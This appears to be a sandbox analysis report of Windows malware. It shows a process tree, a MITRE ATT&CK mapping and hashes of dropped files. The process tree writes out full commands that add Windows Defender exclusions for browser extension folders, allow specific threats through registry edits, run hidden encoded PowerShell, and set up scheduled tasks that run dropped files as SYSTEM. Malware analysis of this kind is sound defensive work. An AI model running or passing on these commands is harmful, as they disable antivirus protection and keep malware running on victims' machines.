C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPqHyUjhD" /SC once /ST 12:18:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPqHyUjhD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPqHyUjhD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 14:52:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\vHQYyqX.exe\" aV /TBOzdidWI 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\vHQYyqX.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\vHQYyqX.exe aV /TBOzdidWI 385118 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\dLFkbD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F2⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
3Virtualization/Sandbox Evasion
2Impair Defenses
1Disable or Modify System Firewall
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Unsecured Credentials
4Credentials In Files
3Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD57be838f4ac8539526013b533ba6db887
SHA12e946b83e4449d2c0b15a7bf349e10a91e12f943
SHA256a22b2c46b1ca89e55eb80770192f2c0364604274f9f7c4c2690d08360e0a97bc
SHA512437a2f6023ebd95a720b8a53af676b9e46bef33e0115ce13c63b0c374375cb916eef2e2511e9ef559941f07ce5e3f8f73149d8c3588950322d14c3205be0972b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ae626d9a72417b14570daa8fcd5d34a4
SHA1c103ebaf4d760df722d620df87e6f07c0486439f
SHA25652cc3f3028fab0d347a4a3fffef570b42f85748176d81a3344996d42fd1de32a
SHA512a0690bda318bdf43d6f292f88d4ea2ebeec83b95e9ebca80083dbb08e7ddcdb9735cc58b89d369a34f10acf8a114d4a207ed8d0f070c5baf87c5798e9f35bc14
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5ac4917a885cf6050b1a483e4bc4d2ea5
SHA1b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5170a2db07db8bc1268950cdf3016c2b3
SHA12543a38964a29e411b91bdfe36ce1573caf8f252
SHA2561f8533175db21faf8e1af7e1c382cf64c68d9f0924ac171f2cfe16ae631f62ce
SHA512734759cc0842b114a22736068a1c7aa555fc662b433d540d4702d2e648b9dfebb4e3b0c7e51647229330a0802418ac7d5d36e317a814c033b2837390aa7904bd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b3a83d0196afc480a90a1e7444210036
SHA16376ef283df20976769287b3bdc6bcd5d5ce371f
SHA2563ac4190b1c447f3b5365b056150575ec779ffba10b82d940c93009e2f6809a07
SHA512dfff8f23370ae8ab390b8a3dd675dd71ca6a8d0fac0f0c9a8b43453763ba5fa96a79a4b5a8891bcac86996471b912ca51dfc6b877d647391d14e355191d77370
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5ca9cf1c14e59bbcacaeac0ac0d6e1a29
SHA1bc465bc5184ada2bf6580b2534a5f6c1094b4db2
SHA256e148d1170e4af21b6c768b53cde31475ba0e8ee062c58ff914bcb44676bc95eb
SHA512b863232c51415853a664e7d67143139f36ae379eec46629f0f7fd860043498c22dc31dc17987c42c523cdaca8ac99ffb47507caab4b3da70a95a21d261351252
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD580b42fe4c6cf64624e6c31e5d7f2d3b3
SHA11f93e7dd83b86cb900810b7e3e43797868bf7d93
SHA256ee20a5b38a6674366efda276dbbf0b43eb54efd282acfc1033042f6b53a80d4d
SHA51283c1c744c15a8b427a1d3af677ec3bfd0353875a60fe886c41570981e17467ebbb59619b960ca8c5c3ab1430946b0633ea200b7e7d84ab6dca88b60c50055573
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD578a69ba7f89a69ad37b3791f8c4b4824
SHA1f35cac181261bb312fd409e5c164a3f56369fe8d
SHA256783ca2d3ee479c7f5191ed213c542ca450a40604b15ecc948812685f6eb9394b
SHA5125c39204c7e851601b6aaec89275ad26556a5f53ce5dc2a5a75c0871684c828a1b5dcd3ccd29fd5efbf2bfc450d03ae128358551877da8ed68629e8ac0108c545
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\additional_file0.tmpFilesize
2.5MB
MD515d8c8f36cef095a67d156969ecdb896
SHA1a1435deb5866cd341c09e56b65cdda33620fcc95
SHA2561521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\opera_packageFilesize
103.9MB
MD5b7e7c07657383452919ee39c5b975ae8
SHA12a6463ac1eb8be1825b123b12f75c86b7fff6591
SHA2561d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9
SHA512daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39
-
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exeFilesize
321KB
MD51c7d0f34bb1d85b5d2c01367cc8f62ef
SHA133aedadb5361f1646cffd68791d72ba5f1424114
SHA256e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c
SHA51253bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exeFilesize
2.7MB
MD531841361be1f3dc6c2ce7756b490bf0f
SHA1ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA51253d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exeFilesize
460KB
MD5b22521fb370921bb5d69bf8deecce59e
SHA13d4486b206e8aaac14a3cf201c5ac152a2a7d4ea
SHA256b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158
SHA5121f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeFilesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exeFilesize
304KB
MD58510bcf5bc264c70180abe78298e4d5b
SHA12c3a2a85d129b0d750ed146d1d4e4d6274623e28
SHA256096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6
SHA5125ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exeFilesize
158KB
MD5586f7fecacd49adab650fae36e2db994
SHA135d9fb512a8161ce867812633f0a43b042f9a5e6
SHA256cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e
SHA512a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exeFilesize
386KB
MD50c4043a9a9efff20810530fd0cad91d7
SHA1ca3adc7e4f1a027a2969749ccd5e2c1b06b88162
SHA2561153b99ea7a217692d63ef2c95b61f9b781862793ed5cdff3f53f0b43d9c8ccc
SHA512e5cb239c051ad141a56ca464be8068cebdc58029e39bc2d31495b27a5267604748f590397c2269d01b42f07af5a8840c8d3b339f4f042db165bd9c023a332d17
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exeFilesize
50KB
MD517eefbaaa30123fa3091add80026aed4
SHA18e43d736ea03bd33de5434bda5e20aae121cd218
SHA256b780f8659c3cfab33ffa95b25b396b2b8ade8bd40c72aaf7c87ad3c6b6cf34c5
